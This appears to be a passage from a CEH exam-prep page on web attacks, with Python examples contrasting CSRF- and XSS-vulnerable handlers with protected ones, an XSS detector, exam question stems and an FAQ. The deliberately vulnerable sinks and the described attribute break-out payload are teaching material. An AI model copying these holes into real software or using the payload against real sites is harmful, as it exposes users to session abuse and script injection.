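Questions 149, 160 and 170 above describe the same gap from both sides: a cookie-authenticated state change with no anti-forgery token. The following is an added example, not code from the original page or from any framework; SITE_ORIGIN is an assumed application origin and SESSIONS is a constructed in-memory session store. It puts the vulnerable handler beside one that layers the three standard defences: a per-session synchronizer token, an Origin/Referer check, and a SameSite cookie attribute.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example.com"  # assumed origin of the application
SESSIONS = {}  # constructed in-memory session store: session id -> session dict


def new_session(user):
    """Create a session together with a per-session synchronizer token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "email": None, "csrf": secrets.token_urlsafe(32)}
    return sid


def session_cookie_header(sid):
    """Set-Cookie value: SameSite=Lax keeps the cookie off cross-site POSTs."""
    return f"session={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


def csrf_token_for(sid):
    """Embed this in a hidden form field on pages rendered for the session."""
    return SESSIONS[sid]["csrf"]


def _same_origin(header_value):
    # Compare scheme://host[:port] exactly; a prefix test would accept
    # https://app.example.com.attacker.example.
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def change_email_vulnerable(headers, cookies, form):
    """Only checks the session cookie, which the browser attaches on its own."""
    sess = SESSIONS.get(cookies.get("session"))
    if sess is None:
        return 401, "not authenticated"
    sess["email"] = form["email"]
    return 200, "email updated"


def change_email_protected(headers, cookies, form):
    """Session cookie + Origin/Referer check + synchronizer token."""
    sess = SESSIONS.get(cookies.get("session"))
    if sess is None:
        return 401, "not authenticated"
    source = headers.get("Origin") or headers.get("Referer")
    if source is not None and not _same_origin(source):
        return 403, "cross-site request"
    token = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(token.encode(), sess["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    sess["email"] = form["email"]
    return 200, "email updated"
```

The forged request in question 160 carries the victim's cookie but cannot carry the token, because the attacker's page cannot read the victim's form; that is what makes the token check decisive even when the Origin header is absent. SameSite=Lax addresses the same request one layer earlier, by not sending the cookie at all on a cross-site POST, which is why the protected handler then answers 401 rather than 403.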

171

A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)
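Questions 146, 161 and 171 above separate stored from reflected XSS by where the payload comes from, but the fix is the same at the sink: encode output for the context it lands in. The following is an added example, not code from the original page or from any framework; FEEDBACK is a constructed in-memory stand-in for the feedback table and the two render functions are the hypothetical admin page and search page. The detector parses the rendered HTML and reports whether a script element or an on* event handler actually came out, which is a more reliable test than grepping for the payload string.

```python
import html
from html.parser import HTMLParser

# Constructed feedback store standing in for the database in question 146.
FEEDBACK = []


def submit_feedback(text):
    FEEDBACK.append(text)


def render_admin_page_vulnerable():
    """Stored XSS sink: feedback is interpolated into the HTML unchanged."""
    rows = "".join(f"<li>{entry}</li>" for entry in FEEDBACK)
    return f"<ul>{rows}</ul>"


def render_admin_page_escaped():
    """Same page with output encoding for the HTML text context."""
    rows = "".join(f"<li>{html.escape(entry)}</li>" for entry in FEEDBACK)
    return f"<ul>{rows}</ul>"


def render_search_vulnerable(query):
    """Reflected XSS sink: the query is echoed into an attribute and into text."""
    return f'<input name="q" value="{query}"><p>Results for {query}</p>'


def render_search_escaped(query):
    """html.escape with quote=True also encodes the quotes that would close the attribute."""
    safe = html.escape(query, quote=True)
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


class _ActiveContentCollector(HTMLParser):
    """Collects script elements and on* attributes from rendered markup."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def active_content(markup):
    """Return what a browser would execute from this markup, as the parser sees it."""
    collector = _ActiveContentCollector()
    collector.feed(markup)
    return {"script_tags": collector.script_tags,
            "event_handlers": collector.event_handlers}
```

The attribute break-out payload (a closing quote followed by autofocus onfocus=...) is the case worth noticing: it contains no angle brackets, so an escaper that only converts < and > lets it through, while html.escape's default quote=True stops it. Encoding is context-specific; a value placed inside a JavaScript string or a URL needs that context's encoding rather than HTML entity encoding.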

172

During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)


Frequently asked questions

What does the Web Application and Injection Attacks domain cover on the CEH exam?

The Web Application and Injection Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.

How many Web Application and Injection Attacks questions are in the CEH question bank?

The Courseiva CEH question bank contains 172 questions in the Web Application and Injection Attacks domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Web Application and Injection Attacks for CEH?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Web Application and Injection Attacks questions for CEH?

Yes — the session launcher on this page draws questions exclusively from the Web Application and Injection Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
